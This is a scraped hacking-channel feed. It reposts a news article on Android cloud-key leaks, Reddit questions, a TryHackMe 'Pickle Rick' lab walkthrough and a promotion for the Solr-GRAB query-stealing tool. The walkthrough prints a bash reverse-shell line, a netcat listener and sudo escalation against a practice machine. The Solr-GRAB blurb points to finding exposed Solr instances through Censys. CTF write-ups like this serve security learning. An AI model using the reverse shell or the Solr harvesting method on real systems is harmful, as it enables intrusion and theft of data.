Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
66K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking 100M Android Users Hit By Rampant Cloud Leaks https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg 100M Android Users Hit By Rampant Cloud LeaksPost Views: 18 Reading Time: 1 Minute…
and horoscope prediction report.”

Meanwhile, push notification managers in many of the apps weren’t password-protected either.  Push notifications are familiar to most of us as those unsolicited notes that pop up as an alert, flagging news, new emails, new content, how many steps one has taken that day or what have you, from various apps installed on the phone.

“Most push notification services require a key (sometimes, more than one) to recognize the identity of the request submitter,” according to the analysis. “When those keys are just embedded into the application file itself, it is very easy for hackers to take control and gain the ability to send notifications which might contain malicious links or content to all users on behalf of the developer.”

This could be weaponized in ingenious ways, such as hackers intercepting news alerts to replace legitimate content with fake news, or phishers injecting phishing links into the notifications – all of which are sent from the legitimate app, so users are none the wiser. Cloud Keys Up in the Air for the TakingIn the case of at least two of the apps, cloud keys were exposed with no safeguards, according to the researchers.

For instance, the Screen Recorder app does what it says – it records the user’s screen and then saves the recordings in the cloud for later access. It has more than 10 million downloads.

Unfortunately, the developers saved users’ private passwords on the same cloud service that stores the recordings.

“With a quick analysis of the application file, [Check Point] researchers were able to recover the mentioned keys that grant access to each stored recording,” they explained. See Also: Hacking Stories: Xbox UndergroundIt’s a bad practice to hardcode and store static access keys into an app, Michael Isbitski, technical evangelist at Salt Security, said via email.

“The app in turn uses [the keys] to connect to an organization’s own backend APIs and third-party (e.g., cloud) APIs,” he explained. “Compiled code within mobile app binaries is much more readable than many developers realize. Decompilers and dissassemblers are plentiful, and such connection keys are easily harvested by attackers. Attackers then bypass the app entirely and connect directly to backend APIs to abuse the business logic of the app or scrape data.”

If you opt to use cloud storage as a developer, you need to ensure any key material necessary to connect to such storage is kept secure, and you must also leverage the cloud provider’s access control and encryption mechanisms to keep the data protected. Mobile app developers should make use of the Android Keystore and Keychain mechanisms that are backed by the hardware security module of the mobile device. Developers should also make use of the Android encryption mechanisms when storing other sensitive data client-side.

The second app was iFax, which made a similar blunder. In this case, the developers stored the cloud keys and the fax transmissions in the same cloud.

“With just analyzing the app, a malicious actor could gain access to any and all documents sent by the 500,000 users who downloaded this application,” according to Check Point – a problem given that the heaviest users of faxes these days are regulated industries like healthcare and financial companies. What to Do if Your Data is Leaked by an AppImperva Research Labs has found that data-leakage incidents have increased 557 percent over the past 12 months, and are up 74 percent since the beginning of 2021, according to Ron Bennatan, general manager for data security for Imperva.

“Enterprises need to stop thinking of application security and data security as disparate entities, because attackers certainly aren’t thinking that way, and it’s creating opportunities for them to access data,” he said. “A good enterprise takes a data-centric approach and secures the data itself, and not just the endpoints connected to the database.”
[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
and horoscope prediction report.” Meanwhile, push notification managers in many of the apps weren’t password-protected either.  Push notifications are familiar to most of us as those unsolicited notes that pop up as an alert, flagging news, new emails, new…
Cloud misconfigurations that leave data publicly exposed happen all the time, in other words – and unfortunately, there’s very little that end users can do to protect themselves from an exposure. But there are steps to take after a data leak occurs, researchers said.

“End users can take proactive steps to protect themselves when their data does get exposed,” Irene Mo, senior consulting associate at Aleada, said via email. “My two top tips are: 1) set up multifactor authentication for every account that offers it, and 2) lie on account security questions. The answers to common security questions, like a user’s childhood street name or their favorite color, can be found publicly online. If a user lies on their security questions, only the user knows how they lied. And to keep track of their lies (a bonus tip), use a password manager.”
Source: threatpost.com (Click Link)Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/Untitled-design-3-2-90x90.png WP Statistics Bug Allows Attackers to Lift Data from WordPress Sites1 day ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/Untitled-design-4-90x90.png Windows PoC Exploit Released for Wormable RCE4 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/Untitled-design-3-1-90x90.png Microsoft, Google Clouds Hijacked for Gobs of Phishing5 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/Untitled-design-2-2-90x90.png Microsoft, Adobe Exploits Top List of Crooks’ Wish List6 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/Untitled-design-3-90x90.png Bizarro Banking Trojan Sports Sophisticated Backdoor1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/Safari_Browser-90x90.jpg ‘Scheme Flooding’ Allows Websites to Track Users Across Browsers1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/Mac-Malware-90x90.jpg Apple’s ‘Find My’ Network Exploited via Bluetooth2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/Untitled-design-2-1-90x90.png GitHub Prepares to Move Beyond Passwords2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/Untitled-design-2-90x90.png Wormable Windows Bug Opens Door to DoS, RCE2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/Yellow-Duck-Malware-90x90.jpg Lemon Duck Cryptojacking Botnet Changes Up Tactics2 weeks ago
The post 100M Android Users Hit By Rampant Cloud Leaks first appeared on Black Hat Ethical Hacking.

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Can my TV be hacked?

Sorry if this is the wrong place to post this.

I recently got a wireless adapter for my Viera ST30 plasma TV (2012), then found out that apps like YouTube have been discontinued as part of its Internet features.

Is it possible to have someone hack my TV system and install apps like YouTube and Netflix? Or is there an easier possible way without hacking?

Or at least a browser to download stuff

submitted by /u/TheLegendofReddit
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Can't Clone a Web Application

So am new to programming and lately I've been trying to web application that by default isn't in any of the tools online. I tried custom tools as well like setoolkit and hattrack but it doesn't seem to be working for me.

Hattrack did began to clone the application but application contains millions of communities and it was cloning each and single one of them so i aborted it.

Can someone please tell or guide on how to clone the application ;_; ?

submitted by /u/Mr-Invincible3
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Pickle Rick TryHackMe Walkthrough

Today it is time to solve another challenge called “Pickle Rick”. It is available at TryHackMe for penetration testing practice. The challenge is of easy difficulty if you have the right basic knowledge and are attentive to little details that are required in the enumeration process. The credit for making this machine goes to tryhackme. The breakdown of the Machine with the redacted flags is as follow: Level: Easy· Network Scanningo Nmap ScanEnumerationo Enumerating HTTP ServiceExploitationo Exploiting Command ModulePrivilege Escalationo Enumerating Sudo PermissionsWalkthroughAfter Booting up the target machine from the TryHackMe: Pickle Rick CTF Page, an IP will be assigned to the machine and will be visible on that page as well.IP Address: 10.10.43.98Three questions are required to complete this machine. Network ScanningWe will start a Nmap scan with the -sC for Default Scripts and -sV for Scanning Versions.nmap -sC -sV 10.10.43.98https://1.bp.blogspot.com/-dya_scxmP-Q/YKzGkgVQcBI/AAAAAAAAwLg/QHUcY4rLqVQRAI1RESSkJ-k3fqqyFiPfACLcBGAsYHQ/s16000/1.png Nmap was able to identify 2 services running on the target machine. It included SSH (22), HTTP (80).EnumerationSince we don’t have credentials for the SSH service, we will begin the enumeration from the HTTP service. We see a simple Rick and Morty-themed webpage. It reads a message from Rick to Morty. It tells Morty that Rick has turned himself into a Pickle again. The twist is that he is unable to change back. He asks Morty to login into his computer and extract 3 secret ingredients that are required for Rick to get back to human from Pickle. Since Rick has forgotten the password for his computer, Morty is required to use his Hacking Skills to get those ingredients. http://10.10.43.98/https://1.bp.blogspot.com/-cAdSYwGIzS0/YKzHUfAij1I/AAAAAAAAwLo/Qa3_s5tBJ58tJiLrLFR15CL4q905Vtp1QCLcBGAsYHQ/s16000/2.png We try to look for any clues inside the webpage itself. We check the source code to find the username R1ckRul3s.view-source:http://10.10.43.98/https://1.bp.blogspot.com/-9lIhRaJDsiM/YKzHbVT4WsI/AAAAAAAAwLs/7lxxVpGGZCQxaftMy5btZ2gS3qh3sViiQCLcBGAsYHQ/s16000/3.png There are two possibilities here, either this is a username that can be used to log in via SSH or there is another login module inside the web application. To enumerate the second scenario, we ran a directory Bruteforce using dirb as shown in the image below. We found the robots.txt filedirb http://10.10.43.98. https://1.bp.blogspot.com/-Ubfb5vChmB0/YKzHhcod1TI/AAAAAAAAwLw/Rc-3w_LZsZ8hJy-BaLDbLCq4BENeUxN3ACLcBGAsYHQ/s16000/4.png Upon reading the robots.txt, we found Rick’s famous quote Wubbalubbadubdub. This may be the password for the user that we found earlier. Now we need to enumerate that login page if there is any. http://10.10.43.98/robots.txthttps://1.bp.blogspot.com/-cDH02QCqN-U/YKzHl6cpVuI/AAAAAAAAwL0/7hObyhRS[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles|Raj Chandel's Blog Pickle Rick TryHackMe Walkthrough Today it is time to solve another challenge called “Pickle Rick”. It is available at TryHackMe for penetration testing practice. The challenge is of easy difficulty if you have the right…
jtMbh30qGa-ZxsmEou5nlIzdwCLcBGAsYHQ/s16000/5.png Back to our directory Bruteforce, this time we included the extension filter with the Bruteforce. We checked for the php files. After running for a while, it was able to extract a login.php. Maybe this is the portal that can be used to login into the web application<o:p dirb http://10.10.43.98 -X .php<o:phttps://1.bp.blogspot.com/-_5psAnvIhcc/YKzHrX1nxNI/AAAAAAAAwL8/GNUVs9grX2EObrzXoVPpBS7ExMV4uNR-wCLcBGAsYHQ/s16000/6.png Upon opening the login.php in the web browser, we see that it is the portal login. We use the username that we were able to enumerate from the source code of the home page and the password that we were able to enumerate from the robots.txt. <o:p http://10.10.43.98/login.php<o:pR1ckRul3s<o:pWubbalubbadubdub<o:phttps://1.bp.blogspot.com/-Nl3WaS9OO9g/YKzHvYcoKWI/AAAAAAAAwMA/kwwPJwEdPc4g5rVptRtagz0I1fxlneS4gCLcBGAsYHQ/s16000/7.png Exploitation<o:pWe were able to log in using the credentials. There were a bunch of other pages and options on the menu. However, the Commands tab attracted our attention. As expected, it was a panel that can be used to run system commands on the target machine. We ran the ls command to find a text file by the name of Sup3rS3cretPickl3Ingred.txt<o:p

<o:p https://1.bp.blogspot.com/-5iZQjevJY0k/YKzH0AP26UI/AAAAAAAAwMI/HzsWXMxTdAMkv8nyFdAtFifJhI7Q7zxSQCLcBGAsYHQ/s16000/8.png We tried reading the Sup3rS3cretPickl3Ingred.txt file using the cat command but we were intercepted by Mr. Meeseek he says that cat command is restricted. <o:p https://1.bp.blogspot.com/-xbhdIdFPU0Q/YKzH4BKG9uI/AAAAAAAAwMQ/8rkUp1EkAjIz6gyORt5y9vWAf75p6YFVACLcBGAsYHQ/s16000/9.png This is when we decided to pop open a reverse shell by executing a reverse shell script into the command section.<o:p bash -c 'bash -i >& /dev/tcp/10.10.210.158/8080 0>&1'<o:phttps://1.bp.blogspot.com/-uIlK0iA8-u8/YKzH9kSTQgI/AAAAAAAAwMY/5b4NfzzT-zYGQWoQPH-G8bPfWXIeBlY-gCLcBGAsYHQ/s16000/10.png We started a Netcat listener before executing the reverse shell script command on the web application. As soon as the execution went through, we had a reverse shell on the target machine as depicted below. Now there is no restricting that is stopping us from reading the Sup3rS3cretPickl3Ingred.txt file. We see that it contains one of the three Ingredients.<o:p nc -lvp 8080<o:pls<o:pcat Sup3rS3cretPickl3Ingred.txt<o:phttps://1.bp.blogspot.com/-rG5bbqB_XXU/YKzIBdWWAqI/AAAAAAAAwMg/L-_Bc06f7tQlfJCRA-kS7XkFAwEDiXJbwCLcBGAsYHQ/s16000/11.png The session that we have generated is for the user www-data. We enumerate the users on the machine to find the user rick. We traversed into the home directory of the rick user to find the Second ingredient. <o:p cd /home<o:pls<o:pcd rick<o:pls<o:pcat 'second ingredients'<o:phttps://1.bp.blogspot.com/-XrTFczj8wLw/YKzIGKwtA0I/AAAAAAAAwMo/2Urbe9YaWUoGNnI4X0zA_nPJXZCoxIZ1wCLcBGAsYHQ/s16000/12.png Privilege Escalation<o:pNow, we need to elevate the privileges on this machine to proceed. We check for the sudo permissions for the www-data user. We see that it can run all commands as root. We use the sudo command with bash to get the root shell. We were able to get the root shell on the machine. We then proceeded to read the Third Ingredient and conclude the machine. <o:p sudo -l<o:psudo bash<o:pwhoami<o:pcd /root<o:pcat 3rd.txt<o:phttps://1.bp.blogspot.com/-4Ae7W3cRLrI/YKzIMN32JCI/AAAAAAAAwMs/CEcyFUbPksoLrhnfOwyBxcBsuc7WkCR5QCLcBGAsYHQ/s16000/13.png
Solr-GRAB - Steal Apache Solr Instance Queries With Or Without A Username And Password

Steal Apache Solr instance Queries with or without a username and password. DISCLAIMER: This project should be used for authorized testing and educational purposes only.Download git clone https://github.com/GnosticPlayers/Solr-GRAB Usage You can search for Apache Solr Instances via Censys, with the dork "Welcome To Solr" or "Apache Solr Admin". To grab queries, simply go to the http access point, sometimes being on port 80, 443 or 8080. Replace "http://URLHERE/" with a desired URL, such as "http://127.0.0.1/". Replace "PROJECTHERE/" with a desired project entry, such as a directory "users/". Replace "IDHERE" with an ID that is unique per entry in JSON on the apache solr query, such as "id" or "global_id". Lastly, replace "AMOUNTOFROWSHERE" with the amount of rows found in the query, such as "74332". Now execute it with: bash index.sh. Sometimes, you'll have an error where it's a 404 not found. If that's the case, add "/solr/" between "http://URLHERE/" & "PROJECTHERE", such as: https://127.0.0.1/solr/users/. This should fix the problem. Author & Credits Written by GnosticPlayers & g9648 g9648 Email: g9648@riseup.net Gnostic Contacts Email: dreammarket@riseup.net Download Solr-GRAB
Read more...

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles
Bookstore TryHackMe Walkthrough

Today it is time to solve another challenge called “Bookstore”. It is available at TryHackMe for penetration testing practice. This challenge is of medium difficulty if you have the right basic knowledge and are attentive to little details that are required in the enumeration process. The credit for making this

The post Bookstore TryHackMe Walkthrough appeared first on Hacking Articles.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles
Pickle Rick TryHackMe Walkthrough

Today it is time to solve another challenge called “Pickle Rick”. It is available at TryHackMe for penetration testing practice. The challenge is of easy difficulty if you have the right basic knowledge and are attentive to little details that are required in the enumeration process. The credit for making

The post Pickle Rick TryHackMe Walkthrough appeared first on Hacking Articles.